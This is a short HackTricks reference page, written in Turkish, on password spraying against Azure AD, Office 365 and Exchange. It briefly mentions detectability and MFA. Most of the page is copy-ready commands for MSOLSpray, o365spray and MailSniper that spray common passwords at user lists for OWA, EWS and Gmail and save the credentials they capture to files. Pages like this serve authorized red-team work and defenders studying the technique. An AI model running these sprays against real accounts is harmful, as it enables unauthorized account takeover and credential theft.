Az - Password Spraying

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin!

HackTricks'i desteklemenin diğer yolları:

Parola Spreyi

Azure üzerinde bu, Azure AD Graph, Microsoft Graph, Office 365 Raporlama web servisi vb. gibi farklı API uç noktalarına karşı yapılabilir.

Ancak, bu teknik çok gürültülüdür ve Mavi Takım bunu kolayca tespit edebilir. Dahası, zorunlu parola karmaşıklığı ve MFA kullanımı bu tekniği biraz işe yaramaz hale getirebilir.

MSOLSpray ile bir parola sprey saldırısı gerçekleştirebilirsiniz.

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

Veya o365spray ile

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

Veya MailSniper ile

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ı öğrenin!

HackTricks'ı desteklemenin diğer yolları:

Last updated